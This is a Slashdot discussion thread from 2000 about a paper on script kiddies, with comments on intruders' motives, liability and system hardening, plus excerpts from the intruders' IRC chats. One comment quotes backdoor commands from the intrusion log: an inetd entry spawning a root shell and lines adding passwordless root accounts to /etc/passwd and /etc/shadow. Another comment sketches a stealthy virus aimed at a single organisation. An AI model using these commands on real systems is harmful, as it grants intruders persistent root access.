Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
The Internet

Understanding Script Kiddies 224

Kzip sent us an interesting paper on script kiddies. It basically follows a log of a box being cracked and rooted, and then has tons of IRC logs with the responsible folks. A lot of insight into the mentality, but more important, the novice skill level required to do serious damage to many systems.
This discussion has been archived. No new comments can be posted.

Understanding Script Kiddies

Comments Filter:
  • by happystink ( 204158 ) on Thursday July 06, 2000 @04:12AM (#953975)
    There is a buzz when you do something big with a computer, that's sort of like "haha, i actually DID that", which I have felt just when accomplishing non-bad things on the computers, and I think it's the same feeling the kiddies have.

    A few months ago I saw a step by step instruction set on how to exploit a machine with the BIND vulnerability, and I have to admit, I was tempted to try it, to see if it'd work. Moreso, I was kind of like "wow, I could do all these steps even though I'm dumb", and I know if I had there would have for sure been a little buzz of delight.

    I used to buy beer with fake ID before I was of age, and it was the greatest, there was a total high when it worked. That is sort of script kiddy-like, it's not like I dud anything clever or anything, I just showed the clerk my ID and bought it, but it still felt wicked, and I think that's the thing in play here: It's easy to say "oh those kids don't know anything, what they're doing requires no thought" etc, and it's true (reading these transcripts makes you realize how incredibly dumb they are, it's really sad), but it is irrelevant, because as long as breaking into a box gives them a little buzz and feeling of accomplishment, they aren't going to stop.

    p.s. the part where the guy is talking about how fat he is, that is so priceless and hilarious. If it wasn't so pathetic I'd laugh till I cried

  • We've got something very similar in the UK as well, albeit that the Occupiers' Liability Acts rather negate the possible line of defence that the attractant wasn't visible from a lawful place.

    Thing is, those occupiers' liability cases are more about the owner's liability where the kids get themselves hurt: what I want to get at is the owner's liability for what the kids do to others once they're in.

    This, though, is probably a more useful analogy than my shot from the Rylands. v. Fletcher angle: rather than maintaining something dangerous, what we're looking at here is liability for something that attracts children of known propensity and capacity for damage. Since that risk is obvious, there ought to be liability for failure to take account of it? Discuss.

  • Although I'm hardly calling these guys UNIX experts, they're hardly "script kiddies".
    A few of the commands they typed

    /bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob.
    echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
    echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
    echo "r::10891::::::" >> /etc/shadow;
    echo "re::6445::::::" >> /etc/shadow;

    Looks to me as though they have all of the fields in /etc/shadow and /etc/password memorized. Knowing UNIX as well as they do does take some time, knowlege, and ability.

    -Patrick
  • Good points. On the other tentacle, what about the argument that script kiddies are like rats? A natural part of the web ecology, destructive and lacking in any moral sense (at least until they grow up, if they ever do)?

    On that analysis their actions, being predictable consequences of poor security arising from creatures that are not moral agents, are something that the administrator of the compromised system should be responsible for preventing.

    The argument about a scope-sighted rifle is a straw man. Nobody would expect someone to do that sort of thing to a domestic fuel supply; expecting the owner to guard against it is unreasonable. On the other hand, in a neighbourhood full of kids, it is reasonable to expect him to keep the thing locked up so the little buggers can't play with it. (Example from a real case: a bus depot didn't lock its gates at night, and had petrol lying about the place unsecured. Kids got in and began playing a game involving molotov cocktails, and dropping lit matches into buses' fuel tanks.)

    Essentially, the argument is whether the risk of script kiddie attack is sufficiently foreseable that an owner ought to guard against it.

  • <trivia> Use a fixed font, not variable width. Magazines [attrition.org] are usually text, "l33t" instead of "elite" came out of ascii art. </trivia>
  • I don't mean to be rude, but whoever moderated you up, has a lot of the same deluded naivety that you show. Let's see:

    At a start, look at chldren in the US versus other countries. In france or other European countries a 5 year old kid can sit through a formal diner. How many 5 year olds in the US can do the same?

    You really think five year old children are that much different, be they European, American, Indian, Japanese or whatever? Do you really think the notion of proper behavior (which varies with the different cultures) has sulked in by that age? Or did you just have a bad experience with your table neighbour's children yesterday night?

    We have stopped teaching our children responsibility and discipline.

    This is a favourite of conservatives, people who long for the "golden days" and suchlike fools. Responsability is a word much used by them, but seldom understood. You're aware that it is more easily taught by example than by indoctrination, right? And discipline is worth nothing if not rationally accepted, and pondered about. Otherwise it is no different than dog training.

    It is much harder to aquire discipline later in life than early. Hell I am 22 and just now starting to learn to discipline myself. Its NOT easy. Its a skill that needs to be taught young.

    There we go again with the discipline harangue. Discipline is highly overvalued. It is not always necessary, because it restrains leisure, imagination and all easy going things that make life worth living. Sometimes it is crucial, but only if you conscientiously accept it with your intellect. Perhaps you'll understand it when you're thirty.

    All in all, the problems you seem to attribute to society's unwillingness to inflict responsibility and discipline on the young, are actually IMHO, the consequence of people not using rational thought enough in their lifes. Like: buying a cheaper product, even though its production endangers the environment or the local economy.

  • To counter that, if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him. Make sure he knows that there are people behind these machines, and that they're not just machines to be played with.

    This may work with a few kiddiez, but overall it is a bad idea. You are not going to have a meaningful conversation with someone who just wants to screw with your box, and you could end up making yourself a target. The best defense is just to keep your machines as secure as possible. What's more inviting to some fourteen year-old wannabe, a mostly secure box where intrusions are efficiently detected and patched up, or one in which the admins drop in to say "hi?"

    Stopping to chat just turns breaking&entering into more of a game than it already is. This is exciting for the kid, and a pain in the ass for you. For stopping everything from serious crackers all the way down to little kidz, the best policy is no retaliation, no dialogue of any kind.


    --

  • Wow, I must have one of those rare kind of girls... smart, beautiful, and loves this particular geek. =)

    One year ago I would have told you you were full of shit.

    Now I sit here, married to a beatiful, smart, funny gal that happens to think I'm just the coolest dude. And she is fully aware that I'm a geek. She met me when I worked on her computer for her (at work) and spends a lot of time avoiding my "home office" (a room with 8 computers in it). I think girls don't like geeks when they are young and idiotic (just like guys go through that young and idiotic stage), but once they mature they realize that those guys that were such geeks in school are pulling in some serious cash, and actually are quite responsible.

    Food for thought for any teen-age girls in the audience.
  • And how much does it cost to hire a competent sysadmin?
  • Taking your definition of "hacker" as accurate (to save time), you are quite correct. However, they describe themselves as "elite" (or however you want to write that using numbers) hackers, which they certainly aren't.
  • by w00ly_mammoth ( 205173 ) on Thursday July 06, 2000 @06:12AM (#953985)
    fun replying to myself, but there is some seriously solid witty banter in there.

    [ Dick admits he isn't top of the class at creative writing.]

    :D1ck :i want some one with good writing skillz
    :D1ck ::/
    :D1ck :to write About, FAQ
    :D1ck :etc

    [Here we have a fancy debate on the mission statement. These guys take themselves a tad too seriously.]

    :D1ck :is this para write for About
    :D1ck :?
    :D1ck :K1dd13 came into existance almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and
    :Sp07 :?
    :D1ck :organizations to the issue in cyberspace which is today the leading source of communication.
    :D1ck :is that fair enuff?
    :Sp07 :eyah I guess
    :Sp07 :I thought it was like a hacking group

    [ Our l33t h4x0rs look for profound quotes to adorn their web site]

    :Sp07 :what is lahore ?
    :D1ck :lahore==city
    :D1ck :Sp07 give me a good quote
    :Sp07 :I thought it was the whore in french
    :Sp07 :ill go get a quote fo you
    :D1ck :heh
    :D1ck :ok
    :Sp07 :I dont know any in my ehad
    :Sp07 :hea
    :Sp07 :d
    :Sp07 :Silence is gold, if nothing better you hold.
    :Sp07 :tahts gay
    :Sp07 :I heard a quote before
    :Sp07 :goes something like "If you want peace, you must prepare for war"
    :Sp07 :I herad it in a simpsons episode

    [Dick doesn't know what pot is, but tries to look l33t by claiming he has lots of it. Rather Clintonesque admission follows. Spo7 isn't impressed].

    :Sp07 :im a pothead
    :Sp07 :hehe
    :D1ck :oh
    :D1ck :what does it mean btw :P
    :D1ck :?
    :Sp07 :someone who smokes lots of weed
    :Sp07 :hahaha
    :Sp07 :pot-heads
    :Sp07 :pot = weed
    :D1ck :oh
    :D1ck :i get tons f weed
    :D1ck :but
    :D1ck :i dont do it
    :Sp07 :heh
    :Sp07 :not weed in your garden or anything

    [Spo7 expresses skepticism about Dick's impressive fluctuations in mass. He tries to get to the bottom of it. Suspenseful stuff, this.]

    :Sp07 :how much do you weight?
    :D1ck :for real
    :D1ck :300 punds
    :Sp07 :for real?
    :D1ck :yes
    :Sp07 :you serious?
    :D1ck :for real
    :D1ck :
    :D1ck :yep
    :D1ck ::)
    :D1ck :serious
    :Sp07 :dont lie
    :Sp07 :hehe
    :D1ck :i`m FAT
    :Sp07 :300 is a lot
    :D1ck :as
    :D1ck :s
    :D1ck ::)
    :D1ck :nope i`m 300#$@
    :Sp07 :how old are you?
    :D1ck :17

    :D1ck :dude
    :D1ck :4 years back
    :Sp07 :H M
    :Sp07 :H M
    :D1ck :i was 400
    :D1ck :and then i lost 200
    :Sp07 :DAYUMMMMMMMMM
    :Sp07 :you liar
    :D1ck :nutriotion
    :D1ck :and then
    :Sp07 :how can you be 400 pounds when your 13?
    :D1ck :I WAS
    :Sp07 :you liar
    :D1ck :tendency
    :D1ck :and
    :D1ck :lots of eating
    :D1ck :but then i left the diet and excersise
    :D1ck :but i`ll loose it again
    :D1ck :i`m serious now
    :D1ck ::)
    :Sp07 :400 is too much for a 13 year old
    :D1ck :when i`m serious imake sure to achieve the goal
    :Sp07 :maybe like 200 is cool
    :Sp07 :but 400
    :Sp07 :no way
    :D1ck :hahahaha
    :Sp07 :200 is still fat but 400 is like a fucking elephant

    [Dick has forgotten he has said he smokes weed. A rare occasion when he admits not knowing something follows...]

    :D1ck :smoking marjuana is likee 'cool'?
    :Sp07 :I GUESS
    :Sp07 :ITS FUN
    :D1ck :oh
    :Sp07 :ITS NOT LIKE SMOKING
    :D1ck :it tastes good?

    [Dick, ever the crafty one, shocks Spo7 with a clever deceptive move. Spo7 almost has a heart attack, but dick clarifies the situation.]

    :Sp07 :IT TAKES ME TO MY OWN WORLD
    :Sp07 :MWUHAHAHAHAHA
    :D1ck :Ok i disclose my self.
    :D1ck :I`m a FED
    :Sp07 :??
    :Sp07 :OH SHIT
    :D1ck :You are busted
    :Sp07 :FUCK YOU
    :Sp07 :DIE MOTHER FUCKER
    :Sp07 :FOR REAL????
    :Sp07 :officer
    :D1ck :yes.
    :Sp07 :suck my dick
    :D1ck :dude
    :D1ck :relax
    :Sp07 :no wonder
    :Sp07 :how would a pakistanian know english
    :Sp07 :its all clear
    :Sp07 :hey
    :D1ck :hehe
    :Sp07 :your not really a fed right??
    :D1ck :y0
    :D1ck :?
    :Sp07 :dont even joke like that
    :D1ck :nope
    :D1ck :ok
    :Sp07 :MAKES ME FEEL NERVOUS
    :D1ck :i`m not a fed
    :D1ck :why did u take it so serious?
    :Sp07 :I DUNNO

    :D1ck :man dont think i`m a fed
    :D1ck ::)
    :D1ck :i`m a elite hacker
  • While I agree with a lot of what you say, I think your analogy is a bit flawed.

    When a script kiddie breaks into your system could it not also be like someone entering your house (or business) through an open door and using all the tools (the phone, for instance) in your house to call up old ladies and defraud them of their life savings? Open door or not, in most common law countries, entering someone's house without permission to commit a crime is still break and enter (and at the very least trespass). Does that mean that people who left the door open are liable for having their home burglarized? What if the door was not open, just unlocked? Or locked but the key hidden under the mat? See what I mean.

    In a real court of law, I suspect Bert would be seen as a victim as well and thus not held liable. Al maybe liable if he told Bert that the box was secure when in fact it wasn't (to follow my analogy, the lock company that installed a defective deadbolt could probably get sued). And I don't think there is any legal ground for holding me even partly responsible if a third party uses my property (phone, car, what ever) to commit a crime. In my above example, I could not be held liable even in civil court for the losses of the bilked old ladies.

    The "law" probably won't work in this case.

    That's not to say that that security isn't every sysadmin's responisiblity. But if I leave my door open I shouldn't be surprised if I'm burglarized.
    And my niegbours won't talk to me or do business with me if they get affected by it.

  • Does any one have a Script Kiddies to english translator?
  • But that was exactly the same strategy employed with passenger pigeons, and look what happened to that once "infinite" supply. I'm arguing we should take a more conservationalist approach. Do you really want our children to ask us, some day, "Were there really script kiddies?" Do we really want only to respond "Yes, Virginia. When the earth was younger and times were simpler, there roved children not much older than you, who could bring down entire corporations with the click of a button running a script that someone more intelligent than they had written and which they couldn't write for themselves if their lives depended on it." Will we be satisfied to take our children to the museum and show them the stuffed "last living script kiddy" in a realistic but still fake diorama of cheap porn and unfinished highschool English assignments? Will we?
  • :J4n3! :.Filesystem 1k-blocks Used Available Use% Mounted on

    :J4n3! :./dev/hda8 1935132 878956 957780 48% /

    :J4n3! :./dev/hda7 23302 2650 19449 12% /boot

    :J4n3! :./dev/hda1 2064032 1230496 833536 60% /mnt

    :D1ck! :oki

    :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win

    :D1ck! :wait, what is /dev/hda7

    :D1ck! :?

    :J4n3! :linux swap partition

    :D1ck! :ok

    How sad is that..

  • As you can see from the article, the crackers knew little about the underlying OS and the stolen subscriber list (this may be from another article) was the only important data that was compromised. The mentality seems to be that of the hunt--in all but one of the cases, the cracker only wanted to get root access to *a* system--they did not care about how that system was used. As a result, they could do nothing more than say "I got in" or destroy files (and especially sensitive files will be backed up). They do not take the time to study the machine they break into because they really do not care--their callous indifference prevents them from utilizing their access to steal proprietary information. In addition, they are motivated by boredom and a desire to prove themselves, not financial gain.

    By far, the most debilitating aspect of the script kiddies is that they are unorganized and unfunded. It is the difference between an army and a group of thugs--as long as there is little collaboration (not that many of them possess significant knowledge or ability), then chaos reigns and isolated cases or damage are more common than coordinated assaults on vital systems. Right now, it is a game of craps--if they happen to hit an important system, it is not through any planning on their part. The danger comes when specific, critical systems are targetted.

    Script Kiddies pose little threat because they are easily deterred. If the sysadmin installs all of the latest patches and is diligent about dealing with known issues, then the script kiddies "favorite utils" will not work. Since they have no need to crack *that particular system,* they will move on. It is just like when a common thief sees that a house is protected by a burglar alarm, he will just move on in favor of more vulnerable targets. In the case of script kiddies, they do not possess the knowledge to crack a well-protected system even if they tried, so the threat is further reduced.

    In a worst case scenario, script kiddies manage to delete all files on the main file server. The organization may experience 1-2 days of downtime and a few $100,000s - $1,000,000s in lost productivity. Eventually, the system will be restored and the people will return to work. Now, imagine that there is a coordinated assault against *your* server. You are a publicly traded company that is scheduled to report its quarterly earnings in a week; suddenly, hackers enter your system and seem to just delete all of your files. Almost immediately, your shares lose 1/3 of their value as one of your largest institutional shareholders sells its entire holdings in "anticipation" of your earnings report. Executives lose lots of money and you may be subject to an SEC investigation and shareholder lawsuits alleging insider trading. Which is more of a threat to your organizations long-term stability?
  • It's an interesting idea, and it would encourage security, but it would only stand up in court for about 4-5 nanoseconds.

    Generally, vicitimizing the victim by making him pay would be looked down upon. How about this? I break into your house, paw through your laundry, eat your food, and then leave without damaging anything. Should you be required to pay me for your lack of security?

    Granted computers are different since you can launch attacks on other people from compromised computers, and you can't do that from houses. But the point is that making victims pay because they were victimized is going to piss off a LOT of people. :)

  • by TheCarp ( 96830 ) <sjc&carpanet,net> on Thursday July 06, 2000 @06:22AM (#953992) Homepage
    > Then again, could it be that society implicity
    > tells boys that they need to be "macho and
    > manly"? Sort of how society tells girls they
    > need to be "skinny and beautiful"?

    I think its more than that. People always want to blame drug abuse, violence, etc as "the problems" when really, I think they are symptomes of larger, and more fundamental, problems with our societies social structures...specifically they are rotting.

    At a start, look at chldren in the US versus other countries. In france or other European countries a 5 year old kid can sit through a formal diner. How many 5 year olds in the US can do the same?

    We have stopped teaching our children responsibility and discipline. In fact, we have taught them that they can be irresponsible...its expected of them.

    Now as for firearms...they ARE a buzz enhancer in a way. I have used them...holding a gun is a high in and of itself. The realization that YOU now can decided life or death at a whim. Its power.

    Does that make them bad? No. It, like anything, is something a person must be taught to control. I have cousins who have owned firearms since they were 11. They are some of the safest people I know with guns. They were taught the simple rules from extremely early ages.

    You NEVER point a gun unless you intend to fire it. You NEVER point a gun at a person unless your life is in danger. You ALWAYS treat every gun as if its loaded (even if you have the firing pin in your pocket!). Its all about respect for the power of the tool and for basic life.

    It is much harder to aquire discipline later in life than early. Hell I am 22 and just now starting to learn to discipline myself. Its NOT easy. Its a skill that needs to be taught young.

    All in all I don't think our society breeds healthy life attitudes. Its a much harder problem to solve than just being reactionary and trying to solve the symptomes (like prohibition of drugs, drunk driving penalties, etc etc) but raising responsible people with healthy life attitudes will solve these at the source.

    System cracking is just an extension of adolencent irresponsibility. It is not the problem but the symptom. Catching crackers will no more solve the problem than taking tylanol will get you over your cold faster. (all it does is make you feel better by treating symptoms)
  • by blaine ( 16929 ) on Thursday July 06, 2000 @06:23AM (#953993)
    Try Debian.

    Debian rarely gets broken into, for one reason: the ease at which you can keep packages updated. If a security exploit is found, you'll generally see an updated package appear within a day or less. In fact, I'm on bugtraq, and I often get the updated package a few hours before the announcement is even out.

    How do you get this package, you ask? Well, once or twice a day, run two simple commands. It looks a bit like this:

    [root@host] > apt-get update
    [root@host] > apt-get upgrade

    Anyways, its quick, easy, and works. If you keep up to date [which is REALLY easy], your chance of getting broken into is pretty damn low. Sure, it will never been 100% secure, but its closer than most other distros.

    I used to use Slackware. After a few years of it, I got tired of not having package management, so I switched to Red Hat. After a while, I got tired of searching down packages through rpmfind, and switched to Debian. I haven't looked back since :)
  • And here, direct from the logs, is an important part of script kiddie life:

    :Sp07 :time to play some starcraft

    Seriously, these kids will spend almost all the time they're not exploiting playing starcraft.

  • by Accipiter ( 8228 ) on Thursday July 06, 2000 @04:16AM (#953996)
    I disagree. Script Kiddies aren't out to explore. They go into systems, and run scripts, root boxes, and they think that makes them a hacker.

    So they go around telling their friends "I'm a hax0r! b0w!"

    It's about image. They think they can prove themselves to their peers by cracking a box with a canned program. Exploration has nothing to do with it. If they wanted to explore, they would write the programs themselves. But instead, they take the lazy way out, and run a pre-made program.

    Laziness and Exploration do NOT go hand in hand.

    -- Give him Head? Be a Beacon?

  • by 11223 ( 201561 ) on Thursday July 06, 2000 @04:17AM (#953998)
    Looks to me like they got that from somewhere else. They don't actually have those fields memorized, and probly couldn't tell you a damn thing about what those funny greater than signs are doing in that text.
  • How does the fact that some administrators are lazy and unfit for their jobs make me wrong?

    If you are a competent admin, Debian can be a great tool. It simplifies the process of keeping your system up to date with the latest security patches.

    More often than not, the weak link in the chain is the administrator. Human error and laziness is more likely to get your system broken into than anything else. However, if you are diligent about it, you greatly reduce the risk of breakins. Debian helps out a lot with this, and makes it easier.

    People who deploy systems and then forget about them are the worst type of administrator, for when you assume that you are infallible, you set yourself up to be shown how wrong you really are.
  • > You really think five year old children are that
    > much different, be they European, American,
    > Indian, Japanese or whatever?

    In some ways. by 5 years old children are much more developed mentally than most people give them credit for. They are certainly capable of learning to sit still through a diner by that age.

    > Do you really think the notion of proper
    > behavior (which varies with the different
    > cultures) has sulked in by that age?

    Only partially. The beginings of moral development are in place around 7. (there is an old saying "give me a 7 year old boy, and ill give you a man" or some similar confuguration of words) In fact the whole concept of "childhood" is relativly new (few hundred years old...maybe as many as 500).

    Certainly by age 5 they are able to learn more than they are taught.

    > This is a favourite of conservatives, people who
    > long for the "golden days" and suchlike fools.

    I tend to agree. I also tend to think that no such "golden days" ever existed. Every era has had its problems.

    However, change does happen. Culture changes, society changes. Just because "conservatives" often argue something, doesn't make it wrong (just because they are often very wrong). I believe that people are less disciplined today, in our culture, then they have been in the past. I think our society ENCOURAGES this.

    > ou're aware that it is more easily taught by
    > example than by indoctrination, right?

    Actually indoctrination can work wonders in the right setting...but yes example is how children learn. Many adults arn't much better than their children.

    > There we go again with the discipline harangue.
    > Discipline is highly overvalued. It is not
    > always necessary

    Perhaps you miss what I mean by discipline. Discipline is internal. It is the ability to consiously make a decision and stick with it. The ability to supress desire when needed. Control over ones own mind. The ability to say "Ok I have to do this" and go do it.

    Take meditiation. It is the ULTIMATE form of discipline. The ability to sit down quietly and just sit there for even 5 mins without stiring, without looking around and doing physical things. To be able to say "I am going to just sit here in an upright position with my eyes closed for at least 5 mins" and then to actually do it....that is discipine. (and yes I realize there is more to meditation than that)

    > re actually IMHO, the consequence of people not
    > using rational thought enough in their lifes.

    I definitly agree. Rational thought is important. It is a discipline! Its is about controling oneself. Supressing emotional desires and bias and using rational thought to solve a problem and make a decision.

    > Like: buying a cheaper product, even though its
    > production endangers the environment or the
    > local economy.

    Well no. "cheaper" may be a necessity. How about buying the flashy SUV even though its use endangers the environment, worldwide oil supply and 99% of your driving is JUST you back and forth to work with no cargo.

    Look at the car commercials. They play on emotions. Like the recent "Dodge" adds where they constantly mix the words "Dodge" and "Different" to try to connect the two. This advertising has nothing to do with trying to get you to make a rational decision.
  • ADMROCKS? I didn't know we were hosting that domain name...

    ;)

    -Waldo
  • The ;s are actually there to make it work even if you do not have a correct terminal.
  • by daviddennis ( 10926 ) <david@amazing.com> on Thursday July 06, 2000 @06:31AM (#954011) Homepage
    I own a server on the Internet which basically serves my hobby stuff. Being a busy guy, I simply don't have time to deal with the various patches and such that I should be getting.

    Jon Katz talks a lot about big corporations taking over the Internet and obliverating the little guys. Well, I'm a little guy who has a server with information on it of various types that many folks find useful.

    When someone attacks the big companies, they have resources to deal with it.

    When someone attacks my server, I'm effectively helpless - and that's pretty much burned me out on creating useful stuff and putting it there.

    It seems to me that script kiddies are much more of a threat to "the little guy" than the big corporations that Katz fears. The corporations can't knock us offline, while a script kiddie killed off my server for a solid month.

    I wish there was a way to convey to these people how much misery and anguish they cause on the other side, especially for servers run by individuals who really don't have any good options for protection.

    I've read in this thread stuff like "script kiddies help the ecology of the net by eliminating clueless sysadmins". But what's so bad about being a clueless sysadmin? If I have something to share with the world, and can afford a server to share it with, well, surely I should be able to do it. Why should I have to spend hours of my time trying to keep up with nonsense like this?

    To me, there's nothing more vile and contemptable than a script kiddie. Except, perhaps, the people who publish exploits for them to use.

    Why on earth would someone do something like that?

    D

    ----
  • Who better to conserve this resource than businessmen like myself who rely on the supply of script kiddies for our livelihood?

    The real threat of script kiddie extinction comes from those who consider them worthless pests, and would undertake campaigns of wholesale extermination. We, on the other hand, consider ourselves the stewards of this tasty natural resource.

    Yes, 31337 |\/|337 Enterprises is environmentally friendly. We run a script kiddie breed and release program based on artificial insemination (even under ideal breeding conditions, the poor creatures seem to lack the basic instincts for reproduction, but gathering the necessary samples has never been a problem).

    (Okay, so we just spam AOL accounts with links to |-|/\X0R1N@ +001Z sites, but the end result is the same; would you want to handle script kiddie genetic material?)
  • It's a quick buzz. It makes them feel knowledgeable and powerful with little need for ability, knowledge, or a significant time investment. Low learning curve, and they get to show off their 1337 sk1lls to their girlfriends, or to someone else's girlfriend for that matter.
  • I don't know if what I said made any real difference -- certainly, he'd already started to walk away from script-kiddie stuff -- but I think that the search for recognition and respect was a significant factor in his life...

    I tried very hard once to convince some script kiddies to put their talent where it would do some good. At the time I was an IRC Operator and had occassion to chat with the kids often. Unfortunately they could think of nothing else except making our lives on IRC as miserable as possible; biting the hand that feeds them, essentially, by performing never-ending DoS attacks on the IRC network. No amount of complaining to ISPs would do much good--they had so many rooted boxes it was impossible to provide any compelling evidence.

    One day I heard chat of some of the kids bragging about hacking into NASA. NASA, as many of us know, might as well be considered a honeypot network built solely to test script kiddies' abilities. They compromised a web server at the Goddard Space Flight Center and replaced its web content with yet another Mitnick release demand. (note: no offense intended to administrators at NASA. I suppose they have a huge burden maintaining such a large network of UNIX machines. Dunno).

    On the web page they put up were IRC nicknames I recognized. I thought for some time and concluded some of the kids needed a tough lesson, and now was the time for them to learn it while they were still minors. So, I contacted NASA. To make a long story short, I assisted them in gathering enough evidence for them to investigate. Keep in mind that I did all this while connected to IRC as a plain ol' user, never using oper commands. It wasn't tough; the idiots bragged and lambasted NASA in their public IRC channel!

    Since the main suspect was a minor, I wasn't told what punishment was eventually handed down, nor his real name, of course. I do know his computer was confiscated for a period of time. He knew it was me that ratted him out, and he asked me why. I really don't think I was successful in convincing him that I didn't have any anymosity toward him personally, but that I merely believed his actions, both personally witnessed by me and many others, and what I knew of his exploits, I found appaling.

    So, would he have eventually grown out of it like the script-kiddie mentioned in the post I quoted? Or, would he have continued to hack and hack until finally someone caught him after he turned 18? All I knew was that he was a menace to NASA and to our IRC network, but I truly hope he has squared himself away. I felt a tiny bit sorry for the kid at the time, having never had any desire to rat anybody out, but I don't feel that way any longer.

    I wonder if that kid reads /. Heh.. probably!

  • by Glowing Fish ( 155236 ) on Thursday July 06, 2000 @09:35AM (#954020) Homepage
    At first, I thought this was a joke...(well, the d1ck and j4n3 part was), but there are really people who talk like that? How can anyone be so clueless as to actually be able to call themselves "31337" without a touch of irony? It's almost like hearing someone say "Whoa dude...the Grateful Dead really jammed in that show...it was, like, a heavy trip and stuff, dude"...or any other subcultures stereotyped talking.

  • by Uruk ( 4907 ) on Thursday July 06, 2000 @03:47AM (#954022)
    Doesn't understanding Script Kiddies imply that they do what they do with some logical, understandable purpose?

  • Why are there so many young kids being so destructive? I remember when the "big" hackers of the 80's were quite polite with thier abuse of other computers. But why are these kids so violent?

    My opinion is that thier parents never taught them respect or to value anything. I don't think they even concider the effect their DOS attacks can cause to other people besides just the one they are attacking. An attack on a web site that is being hosted with others effects all the sites hosted there.

    What I'd like to know is why the programmers creating these scripts don't keep them to themselves...
  • This page [uidaho.edu] suggests a solution to the insecurity of software that I almost agree with -- basically, that anyone with the know-how should be spending their time writing viruses and exploits for the woefully insecure OSs we are blessed to work with today, until OSs HAVE to be secure to stand up to the sea of malfeasance that comes in through their net connections. My recommendation is a loop of snide but informative walls...
  • However Unix has far too many programs that are setuid root for no reason. The small job needed (like checking a password) should be put in little programs that are easily confirmed as not having a hole.

    Exactly. For example, the only part of mail handling that needs anything unusual in file system access is the final step of appending the mail to a local user's mailbox. That should be handled by a privileged program about 100 lines long, and nothing else in mail handling should have extra privileges. If Sendmail had been built that way, hundreds of thousands of break-ins would have been prevented.

  • Please explain to me how any stereotypical script kiddie attack/compromise nets them ANY knowledge WHATSOEVER.

    ANYONE can download a script/root kit from the 'Net and use it to compromise a variety of Unix flavors. Script kiddies do not need to learn anything about networking or system administration to utilize these tools.

    From a script kiddie's introduction to the world through his eventual departure, any knowledge gained from these compromises is negligible. They're not getting their "start" here. They're installing Linux at home, maybe learning a little here and there about Unix, and then immediately letting that go to their head (nobody else at school can do this, so I must be smarter than all of them, which means I'm smarter than most everyone in the world!), and they strive to let the world know this. So they attack systems, break in to networks, rack up the numbers and then share their conquests with their l33t-0 IRC friends so everyone else can see what a l33t hax0r they are.

    It has nothing at all to do with learning or self-education and everything to do with adolescent aggression.

    I'm not denying that a certain percentage of these kids will indeed mature, grow up, get educated and get a real job in a similar field. I don't, however, think that this percentage is significantly higher than any other computer-literate group. Script kiddies are just a subset of the "high school computer geek" crowd, and I'd bet you'd find a percentage of any high school computer geek crowd finding a respectable IT job is probably the same across the board.
  • It's all about costs vs. risks.

    If I really wanted to keep Evil Burgler out of my home, I would put in bulletproof glass, steel doors, thousands of dollars of security systems and probably a few armed patrols. Realistically, this isn't feasible for my lowly home. It might be for some areas that desperately need to be secured, but *I* can't afford it. So, I'm acknowledging the fact that an evil visitor could kick down my door and remove the contents of my home, but I've taken what I consider are relatively reasonable precautions to reduce that risk. Sure, I could spend more and reduce the risk even further, but would it be worth it?

    Similarly, you can spend millions of dollars for state-of-the-art hardware, 5 levels of firewalls, intrusion detection software and a staff of IT folks constantly patrolling network traffic looking for any sign of attack or intrusion. For major IT companies, even this may be excessive, but for the lowly server-in-the-garage type, it's obscenely unrealistic.

    Not everyone that wants/needs a server can or will a) get a degree in computer engineering just so he can know enough to properly secure his systems and networks; or b) hire a staff to do the same job

    There's no such thing as a perfectly secure machine. It all comes down to what the administrator is willing to spend (in time, resources and money) to support and maintain his setup, weighed against the risk involved.
  • Ok in the transcripts they learnt something.How to mount ..see disk space.Over the years they may mature and write exploit scripts.Is n't this possible?

    What they learned her is totally irrelevant and completely unrelated to their attacks/compromises. They could/should/probably would have learned this same bit of information if they'd installed Linux at home and decided to goof around with it.

    Well for me how a script kiddie differs from an expert hacker (or whatever we may choose to call him ) is education.

    I agree, just as a convicted arsonist serving the last few months of his prison sentence differs from a highly paid explosives expert only by the education he's undertaken while in the slammer and by the experience and training he hopes to receive after he gets out.
  • > /msg visionary N4RQ!!!

    ROFL!

    That's worth the whole price of admission.

    Is there anyone else out there who remembers this? I think Slashdot must contain a bunch of ex-1337 people.
  • by Anonymous Coward on Thursday July 06, 2000 @10:35AM (#954050)
    BIND can be easily configured to drop root privileges after binding its socket. "named -u dns -g dns" will make BIND run as the "dns" user. A lot of sysadmins just don't take the time (i.e. a few minutes) to do this. I think distros should do it by default.

    BIND also has a "-t" flag, allowing you to chroot it (i.e. "named -u dns -g dns -t /home/dns"). This is also easy if you're a primary nameserver (unlike most chroot programs, you don't need to worry about copying libraries), it will take a bit more work if you're doing secondary DNS (there are HOWTOs available). If someone breaks into your system through a chrooted BIND, they won't be able to get root, since the chroot jail shouldn't have any setuid files in it.

  • that are much more palatable to society at large than vandalism and badass acting, which are generally frowned upon.

    Really? Look at just about any movie (esp action). The 'hero' most of the time will blowup/kill etc all the bad guys etc, with no reguard for little else. It doesn't matter that the car with the bad guy in it that you just blew up goes crashing into the department store, making that blow up as well. The bad guy is dead. Just look at T2; the terminator was a black leather biker look, and he was the hero. Yet he seemed pretty bad ass to me.
  • I should really clarify this just a bit - I'm not referring to the CERT advisories or things like that, but the "rootkits" that make exploitation of a compromised system virtually automatic.

    I see no "white hat" use for those at all.

    D

    ----
  • by LaNMaN2000 ( 173615 ) on Thursday July 06, 2000 @04:32AM (#954058) Homepage
    I think a problem will arise as the media attempts to classify all "black hat" hackers by the actions of these "script kiddies." Even though the vast majority of "damage" is caused by people with little or no computer knowledge just for the "thrill," the script kiddies really pose little significant threat to organizations.

    The real danger is those people who have a clearly defined agenda/ideology in mind when the crack/write viruses. After the outbreak of the "ILOVEYOU" virus, I began thinking about a virus that targets a particular organization and compromises *only* their systems (and copies internal documents, deletes files, etc.). Even though it could replicate with each machine it infects, it would seem completely innocuous until it finds computers that identify themselves within the target domain. It could target particular classes of domains (in the case of worms, for example) that would be more likely to be within fewer degrees of separation from the target--preventing widespread outbreak and collateral damage so as to avoid attention and publicity.

